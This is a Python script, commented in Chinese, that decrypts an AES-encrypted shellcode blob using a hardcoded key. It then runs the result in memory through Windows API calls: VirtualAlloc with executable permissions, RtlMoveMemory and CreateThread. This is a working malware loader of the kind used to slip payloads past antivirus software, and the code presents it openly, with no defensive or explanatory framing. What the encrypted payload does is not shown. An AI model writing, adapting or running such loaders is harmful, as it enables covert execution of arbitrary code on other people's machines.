import ctypes
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad,unpad
import hashlib


# AES 解密
def aes_decode(encrypted_data: bytes, key: str ) -> bytes:
    key_bytes = hashlib.md5(key.encode()).digest()
    cipher = AES.new(key_bytes, AES.MODE_ECB)
    decrypted = unpad(cipher.decrypt(encrypted_data), AES.block_size)
    return decrypted


key = "0XsW6Rn7"
aes_shellcode=b"J\xa7q \x93\xbc\xf2\xdb\xba;'h\xf8\x9c\xa0\xd7\x1f\x9b\x88\xb5\x18q@ue\xb0jXHz\xc47\x025\xdcNu\x1c)\xe2\x81I\xb3\xd9?\xbf\xc0\xf0\x91)k\xe8\xd0\xd5\\%s8\x9d&\x9f/\x0e@X7\xbe\x0b\xe5\xd1\x1a\x1bz\x1e\xf7\x0cF\x13\xa34+\xeb\xc3\x83\xca\xb5UR:dkb;A\xbe\xd6\x17F\x97\xa6\xea\xedldN\x05\xff\x0c\t\xd8*O\xb7\xb0 {z\xd1|\x0b\x94i+,\xf2\x07\xcc\xfe\xd2N\xbc8\x87\x08o\x18Q\x8bN/\xa1\xc2l\xaa\xd6{\x08\x92\x92h\xd5i\x0c\xfc\xfbr\x953t\xfb\x9d\xf9\x0ccJE\x95x\tv\x93\x86\xe0+\x01\x9c\xfb\r\x96\xa4\x12\x98@\xe8\xc0\xcb\xda\x05\x1ai\xbb\xa1\x89`\x00\x10\x08\xc0\xcf+K\xc90\x87\x84\x8e&.\xc8in\xfb\xd9\xddq\x8cz\xd8\x11\xf7\x982'\xee:\x9ep2S}9\xa1\xb9\x06\xa7\x9d\xd5\x87\xe8\x8a\xb2u\x006\x9bly[\xe0\xc4\xa4\xd6\x94$\xf4\xeb\xc9\xb4\xfb\xdd\xb5~\xb1\xe9\xf6\xca\xd6h.\x88\x8f%\xd17\xb4\xf6,\x05\xc06\x1e\x8b+EPW\xb4\xc6"

# 解密
print("[*] 解密 shellcode...")
shellcode = aes_decode(aes_shellcode, key)


# 执行
print("[*] 执行 shellcode...")
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
page = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(page), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(page), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)